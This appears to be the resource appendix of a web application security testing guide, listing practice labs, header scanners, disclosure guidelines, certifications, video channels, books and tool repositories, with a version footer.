
• TryHackMe - tryhackme.com

  • Guided web application security labs

• HackTheBox - hackthebox.com

  • Web application challenges and vulnerable machines

• PentesterLab - pentesterlab.com

  • Web penetration testing exercises

• WebGoat - owasp.org/www-project-webgoat

  • OWASP deliberately insecure application for learning

• DVWA (Damn Vulnerable Web Application) - github.com/digininja/DVWA

  • PHP/MySQL vulnerable web app for practice

• bWAPP - itsecgames.com

  • Buggy web application with 100+ vulnerabilities

Security Headers & Best Practices

• Security Headers - securityheaders.com

  • Online security header scanner

• Content Security Policy (CSP) Reference - content-security-policy.com

  • CSP header generator and reference

• Mozilla Observatory - observatory.mozilla.org

  • Security and privacy analysis for websites

Reporting & Documentation

• CVSS Calculator - first.org/cvss/calculator/3.1

  • Common Vulnerability Scoring System calculator

• Vulnerability Report Template - github.com/vulnreport/vulnreport

  • Markdown-based vulnerability reporting

• Offensive Security Report Template - offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf

Legal & Responsible Disclosure

• security.txt RFC 9116 - securitytxt.org

  • Standard for security contact information

• Responsible Disclosure Guide - cheatsheetseries.owasp.org/cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html

• HackerOne Disclosure Guidelines - hackerone.com/disclosure-guidelines

Browser Developer Tools & Extensions

• Chrome DevTools - developer.chrome.com/docs/devtools

  • Network analysis, JavaScript debugging, storage inspection

• Firefox Developer Tools - firefox-source-docs.mozilla.org/devtools-user

• Browser Extension Security - developer.chrome.com/docs/extensions/mv3/security

Training & Certifications

• OSWE (Offensive Security Web Expert) - offensive-security.com/awae-oswe

  • Advanced web application penetration testing certification

• GWAPT (GIAC Web Application Penetration Tester) - giac.org/certification/web-application-penetration-tester-gwapt

• CEH (Certified Ethical Hacker) - Web module

  • eccouncil.org/programs/certified-ethical-hacker-ceh

• eWPT (eLearnSecurity Web Penetration Tester) - elearnsecurity.com/product/ewpt-certification

YouTube Channels & Video Resources

• PwnFunction - youtube.com/@PwnFunction

  • Animated web security vulnerability explanations

• LiveOverflow - youtube.com/@LiveOverflow

  • Web security, CTF writeups, exploit development

• IppSec - youtube.com/@ippsec

  • HackTheBox web application walkthrough

• STÖK - youtube.com/@STOKfredrik

  • Bug bounty hunting and web hacking

• Nahamsec - youtube.com/@NahamSec

  • Bug bounty tips and web recon

Books & Publications

• The Web Application Hacker's Handbook by Dafydd Stuttard and Marcus Pinto

  • Comprehensive web security testing manual

• Real-World Bug Hunting by Peter Yaworski

  • Bug bounty case studies and techniques

• Web Security Testing Cookbook by Paco Hope and Ben Walther

  • Practical web security testing recipes

• OWASP Testing Guide v4 - owasp.org/www-project-web-security-testing-guide

  • Free comprehensive testing methodology

GitHub Repositories & Tool Collections

• Awesome Web Security - github.com/qazbnm456/awesome-web-security

  • Curated list of web security resources

• SecLists - github.com/danielmiessler/SecLists

  • Security testing wordlists (usernames, passwords, URLs, fuzzing payloads)

• FuzzDB - github.com/fuzzdb-project/fuzzdb

  • Attack patterns and malicious inputs database

• Web-Attack-Cheat-Sheet - github.com/riramar/Web-Attack-Cheat-Sheet

---

Version: 2.0 Last Updated: 2026-04-25 Review Frequency: Quarterly (medium-rot — OWASP Top 10 release cadence, Nuclei template-pack churn, cloud-metadata IMDS evolution, modern attack techniques such as request smuggling / cache poisoning / prototype pollution. Cited CVE/version examples [CVE-2014-0160 Heartbleed, CVE-2014-3566 POODLE, CVE-2011-3389 BEAST, CVE-2012-4929 CRIME, CVE-2015-9251 jQuery, PHP 7.4.3, Apache 2.4.29] are intentionally retained as illustrative teaching cases.)